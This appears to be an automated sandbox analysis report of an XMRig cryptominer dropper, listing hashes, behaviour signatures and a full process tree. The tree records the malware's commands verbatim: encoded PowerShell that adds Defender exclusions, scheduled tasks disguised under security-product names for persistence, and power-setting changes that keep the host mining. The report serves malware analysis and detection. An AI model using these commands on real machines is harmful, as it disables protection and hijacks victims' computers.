xmrig | 81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c

Analysis

max time kernel
201s
max time network
196s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
24-09-2022 22:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe
Size

237KB
MD5

5f74bb48f42d5cc07260e7e96d5652fa
SHA1

764bd78f2af4a51fb5a5c0ffd0ae1ba96a56cfcf
SHA256

81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c
SHA512

42a7925f5d2cbacfcc68ba96fb19e413fbdbc5c9afecd75d44bbda0e8c65467d2ee57d07a4e2f0eae0ab1ae17d95fe453d4ea0aa6198cffed1750e282ab7f0be
SSDEEP

3072:1I0y4Ui91ASc+3ctwIMyPFIJjudUMqhLcziXy7SWdQEn/KvL0JabR5PXStNc:1FqQNc+5TthAv7WzvL0J27PXStNc

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Dllhost\winlogson.exe	xmrig

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

AppLaunch.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts AppLaunch.exe
Executes dropped EXE 2 IoCs

Processes:

dllhost.exewinlogson.exe

pid process

4092 dllhost.exe
304 winlogson.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

pid	process
4092	dllhost.exe
304	winlogson.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe

description	pid	process	target process
PID 2796 set thread context of 1888	2796	81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3904	schtasks.exe
164	schtasks.exe
5052	schtasks.exe
2312	schtasks.exe
2872	schtasks.exe
96	schtasks.exe
1700	schtasks.exe
1804	schtasks.exe
212	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

AppLaunch.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedllhost.exe

pid	process
1888	AppLaunch.exe
3616	powershell.exe
3616	powershell.exe
3616	powershell.exe
1756	powershell.exe
4512	powershell.exe
3340	powershell.exe
912	powershell.exe
812	powershell.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
1756	powershell.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4512	powershell.exe
3340	powershell.exe
4092	dllhost.exe
812	powershell.exe
4092	dllhost.exe
912	powershell.exe
1756	powershell.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4512	powershell.exe
4092	dllhost.exe
912	powershell.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
812	powershell.exe
3340	powershell.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe
4092	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

628

pid	process
628

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

AppLaunch.exepowershell.exepowercfg.exedllhost.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exewinlogson.exe

description	pid	process
Token: SeDebugPrivilege	1888	AppLaunch.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeShutdownPrivilege	2472	powercfg.exe
Token: SeCreatePagefilePrivilege	2472	powercfg.exe
Token: SeDebugPrivilege	4092	dllhost.exe
Token: SeShutdownPrivilege	2672	powercfg.exe
Token: SeCreatePagefilePrivilege	2672	powercfg.exe
Token: SeShutdownPrivilege	4364	powercfg.exe
Token: SeCreatePagefilePrivilege	4364	powercfg.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	912	powershell.exe
Token: SeShutdownPrivilege	5088	powercfg.exe
Token: SeCreatePagefilePrivilege	5088	powercfg.exe
Token: SeShutdownPrivilege	5060	powercfg.exe
Token: SeCreatePagefilePrivilege	5060	powercfg.exe
Token: SeShutdownPrivilege	5060	powercfg.exe
Token: SeCreatePagefilePrivilege	5060	powercfg.exe
Token: SeLockMemoryPrivilege	304	winlogson.exe
Token: SeLockMemoryPrivilege	304	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

winlogson.exe

pid process

304 winlogson.exe

pid	process
304	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exeAppLaunch.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2796 wrote to memory of 1888	2796	81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe	AppLaunch.exe
PID 2796 wrote to memory of 1888	2796	81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe	AppLaunch.exe
PID 2796 wrote to memory of 1888	2796	81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe	AppLaunch.exe
PID 2796 wrote to memory of 1888	2796	81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe	AppLaunch.exe
PID 2796 wrote to memory of 1888	2796	81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe	AppLaunch.exe
PID 1888 wrote to memory of 3776	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 3776	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 3776	1888	AppLaunch.exe	cmd.exe
PID 3776 wrote to memory of 3616	3776	cmd.exe	powershell.exe
PID 3776 wrote to memory of 3616	3776	cmd.exe	powershell.exe
PID 3776 wrote to memory of 3616	3776	cmd.exe	powershell.exe
PID 1888 wrote to memory of 4092	1888	AppLaunch.exe	dllhost.exe
PID 1888 wrote to memory of 4092	1888	AppLaunch.exe	dllhost.exe
PID 1888 wrote to memory of 4092	1888	AppLaunch.exe	dllhost.exe
PID 1888 wrote to memory of 2324	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 2324	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 2324	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1856	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1856	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1856	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4284	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4284	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4284	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4380	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4380	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4380	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 5032	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 5032	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 5032	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1288	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1288	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1288	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 3632	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 3632	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 3632	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1708	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1708	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 1708	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4968	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4968	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4968	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 776	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 776	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 776	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4256	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4256	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4256	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 5096	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 5096	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 5096	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4220	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4220	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4220	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4728	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4728	1888	AppLaunch.exe	cmd.exe
PID 1888 wrote to memory of 4728	1888	AppLaunch.exe	cmd.exe
PID 1856 wrote to memory of 1700	1856	cmd.exe	schtasks.exe
PID 1856 wrote to memory of 1700	1856	cmd.exe	schtasks.exe
PID 1856 wrote to memory of 1700	1856	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 1756	4968	cmd.exe	powershell.exe
PID 4968 wrote to memory of 1756	4968	cmd.exe	powershell.exe
PID 4968 wrote to memory of 1756	4968	cmd.exe	powershell.exe
PID 2324 wrote to memory of 1804	2324	cmd.exe	schtasks.exe
PID 2324 wrote to memory of 1804	2324	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe
"C:\Users\Admin\AppData\Local\Temp\81da89a97b76f03b3d2da7bef83831a8a300038ce4ef552ed983b2168f87dd1c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAEEAcwBLAGoAcgB0AE8AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwA2AEMAMABzAHMAaQBuAE4AUwBHAGEAbQBRACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADQAMwBOAHYASAA4AHoAdgBRAG4AIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:3776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAEEAcwBLAGoAcgB0AE8AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwA2AEMAMABzAHMAaQBuAE4AUwBHAGEAbQBRACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADQAMwBOAHYASAA4AHoAdgBRAG4AIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
PID:1708

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
PID:4928

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:4840

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
PID:3756

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:1020

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe -c config.json
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:304

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo рУФ7мСэооHьZ & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ФеФЙиЯP40я2Шхв
3⤵
- Suspicious use of WriteProcessMemory
PID:2324

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1804

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo вUшЙыясW0 & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo iаQх
3⤵
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1700

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo 0 & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo qQCeIтТШets1у
3⤵
PID:4380

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:96

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo TA & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЮщhtмсЗЖzB
3⤵
PID:4284

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:212

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo OБПNNBLъgW5ж & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Яч78KaхЧIoнЪлDмИZ
3⤵
PID:5032

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:164

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ьxhйЯPЛКyTшKЪъвВfp & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo яВ1ЧмgАQ8эЬ
3⤵
PID:1288

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:2312

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ал7ь7Г2Йsхк & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo AWБJМCНyъYьgMFT4
3⤵
PID:3632

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:2872

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo Б & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo mBКЯлTЫq
3⤵
PID:1708

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:3904

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAC8EWgBBAC8EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAhBDwERAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAJgQiBBEEIAQjAD4AIABAACgAIAA8ACMAawBkAE0EbAAoBD8EaQBJBHIATARqAGMALARMBGMAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFAAQAQxBGIAbABnAEYEaABFBBQEFAQeBC0EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAD4EGAR0AEwAdQA1ABgEKQRIACQEcwBVAEkAOAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvACIELARBAFYAMQBSAEcAHwQrBGUAOgQyBDoEIwA+AA=="
3⤵
PID:4256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAC8EWgBBAC8EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAhBDwERAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAJgQiBBEEIAQjAD4AIABAACgAIAA8ACMAawBkAE0EbAAoBD8EaQBJBHIATARqAGMALARMBGMAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFAAQAQxBGIAbABnAEYEaABFBBQEFAQeBC0EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAD4EGAR0AEwAdQA1ABgEKQRIACQEcwBVAEkAOAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvACIELARBAFYAMQBSAEcAHwQrBGUAOgQyBDoEIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADgEdgA+BEEAbABvABAETwRJBDcEJAQ6BFQAHgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEIEGgRjAHoANQAnBC8ETwRIBDkESwA4BEoANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMALwRTAEsAIwA+ACAAQAAoACAAPAAjAHEAIgQxBGgAWABOBEYAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADAAPgQ1BBsELARUACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwByAEgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBoABwEFQQ5AGsAOAQTBCMAPgA="
3⤵
PID:5096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADgEdgA+BEEAbABvABAETwRJBDcEJAQ6BFQAHgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEIEGgRjAHoANQAnBC8ETwRIBDkESwA4BEoANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMALwRTAEsAIwA+ACAAQAAoACAAPAAjAHEAIgQxBGgAWABOBEYAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADAAPgQ1BBsELARUACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwByAEgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBoABwEFQQ5AGsAOAQTBCMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAEoEQwAzAD4EOQBDAGEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAeBCwEQgRABDUAQQA7BEMEZgBjAEsETgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMASQBOABIEMgAhBEQAIwA+ACAAQAAoACAAPAAjAFIAOAA7BFIASwRRAE0EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACwELgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMATQQsBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AdAAzBBAEIQQrBE4ASQA0AGkAIwA+AA=="
3⤵
PID:4220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAEoEQwAzAD4EOQBDAGEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAeBCwEQgRABDUAQQA7BEMEZgBjAEsETgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMASQBOABIEMgAhBEQAIwA+ACAAQAAoACAAPAAjAFIAOAA7BFIASwRRAE0EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACwELgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMATQQsBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AdAAzBBAEIQQrBE4ASQA0AGkAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo 8h & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЖхAгЮф
3⤵
PID:4728

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:5052

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjABIEQgQ2BEkAcwB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAHQRCAEsAPAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAPARYAEsEQgAzBBgEegB2AE8EMQQwBBEEIwA+ACAAQAAoACAAPAAjAHkAbgAYBDMETgQ2BCgENgREAHgANgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAUQBkAGkAQgAiBEYEMgBEAEEEegBCAGMANQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALgQ4BCsEMARwAG4ATwQyBBwEZgBFACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADgAQAQbBGkANgAjAD4A"
3⤵
PID:776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjABIEQgQ2BEkAcwB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAHQRCAEsAPAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAPARYAEsEQgAzBBgEegB2AE8EMQQwBBEEIwA+ACAAQAAoACAAPAAjAHkAbgAYBDMETgQ2BCgENgREAHgANgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAUQBkAGkAQgAiBEYEMgBEAEEEegBCAGMANQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMALgQ4BCsEMARwAG4ATwQyBBwEZgBFACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADgAQAQbBGkANgAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADIEVQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AUQAwBEwETgBoAEoEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEYAIAQdBGEAQQAWBDEAIwA+ACAAQAAoACAAPAAjAEMAMwARBEEEdABzADEAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADMANQBSAC0EbQBtAEwESgRCAC4EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEIERwQ6BGYAVwA3ADAEdwBCADEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQgRMBCcEMgAUBDAEPwRPBEcAGAQWBGMAIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADIEVQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AUQAwBEwETgBoAEoEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEYAIAQdBGEAQQAWBDEAIwA+ACAAQAAoACAAPAAjAEMAMwARBEEEdABzADEAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADMANQBSAC0EbQBtAEwESgRCAC4EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEIERwQ6BGYAVwA3ADAEdwBCADEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQgRMBCcEMgAUBDAEPwRPBEcAGAQWBGMAIwA+AA=="
4⤵
